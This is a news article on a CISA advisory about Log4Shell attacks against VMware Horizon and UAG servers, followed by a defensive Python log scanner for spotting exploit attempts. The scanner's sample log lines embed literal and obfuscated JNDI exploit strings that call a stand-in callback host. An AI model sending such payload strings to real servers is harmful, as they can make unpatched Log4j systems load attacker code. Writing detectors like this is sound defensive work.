CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
CISA, along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.
Log4Shell first emerged in December and targets a vulnerability in Apache Log4j, open-source logging software used by numerous companies. The initial flaw, along with those found subsequently, allows attackers to gain access to affected systems. The exploits were used not only by run-of-the-mill criminal hackers but also by state-sponsored hacking groups.
Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.
Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability in the Apache Log4j logging library, which is used by a wide range of consumer and enterprise services, websites, applications, and other products.
After breaching the networks, the threat actors deployed various malware strains that gave them the remote access needed to deploy additional payloads and exfiltrate hundreds of gigabytes of sensitive information.
“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” the agencies noted, adding it also offers a “graphical user interface (GUI) access over a target Windows system’s desktop.”
The alert added that organizations should always keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be minimized by hosting essential services on a segmented demilitarized zone (DMZ), enforcing strict network perimeter access controls, and not hosting internet-facing services that aren’t essential to business operations.
CISA also advised organizations that haven’t yet patched their VMware servers to treat them as compromised and start incident response (IR) procedures.
The steps required for a proper response in such a situation include immediately isolating potentially affected systems, collecting and reviewing relevant logs and artifacts, hiring third-party IR experts (if needed), and reporting the incident to CISA.
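The "collect and review relevant logs" step above is where most Log4Shell triage starts: the exploit string has to reach a Log4j-logged field (a User-Agent, a query parameter, a header), so it is usually visible in web-server access logs. The following script is an added illustration, not code from the advisory or from CISA; the log lines are constructed samples in common access-log format, the IP addresses are documentation ranges, and the `callback_target` helper and the nesting heuristic are my own. It flags a literal `${jndi:` lookup, flags any line whose `${...}` lookups are nested (legitimate request data almost never nests Log4j lookups, so this catches obfuscated variants without enumerating them), and pulls out the host:port a flagged line points at so it can go straight onto a block list.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample access-log lines (not from the advisory). Documentation
# address ranges are used for both client and callback hosts.
SAMPLE_LOGS = [
    '203.0.113.4 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [23/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.8 - - [23/Jun/2022:10:01:09 +0000] "GET /portal/?q=${${lower:j}ndi:rmi://198.51.100.23:1099/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.12 - - [23/Jun/2022:10:02:11 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Case-insensitive literal JNDI lookup, tolerating stray whitespace.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# First "scheme://host[:port]" after a lookup; used only on flagged lines.
TARGET_RE = re.compile(r"://([^/}\s\"]+)")


@dataclass
class Finding:
    line_no: int
    reason: str
    target: Optional[str]
    line: str


def max_lookup_nesting(text: str) -> int:
    """Return the deepest nesting depth of ${...} lookups found in text."""
    depth = best = 0
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            best = max(best, depth)
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
        i += 1
    return best


def classify(line: str) -> Optional[str]:
    """Return a reason string if the line looks like a Log4Shell attempt, else None."""
    if JNDI_RE.search(line):
        return "literal jndi lookup"
    if max_lookup_nesting(line) >= 2:
        return "nested log4j lookup (possible obfuscated jndi)"
    return None  # a single, non-jndi ${...} (e.g. a doc path) is not flagged


def callback_target(line: str) -> Optional[str]:
    """Extract the host[:port] the lookup points at, for block-listing (assumed helper)."""
    m = TARGET_RE.search(line)
    return m.group(1) if m else None


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run the heuristics over an iterable of log lines and collect findings."""
    findings = []
    for n, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            findings.append(Finding(n, reason, callback_target(line), line))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.reason}; callback target = {f.target}")
```

Run it against a real access log with `scan(open(path))`; a flagged line is a trigger for the isolation and IR steps above, not proof of compromise on its own, so pair it with outbound connection logs from the Horizon or UAG host toward the extracted target.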
Until you can install patched builds by updating all affected VMware Horizon and UAG servers to the latest versions, you can reduce the attack surface “by hosting essential services on a segregated demilitarized (DMZ) zone,” deploying web application firewalls (WAFs), and “ensuring strict network perimeter access controls.”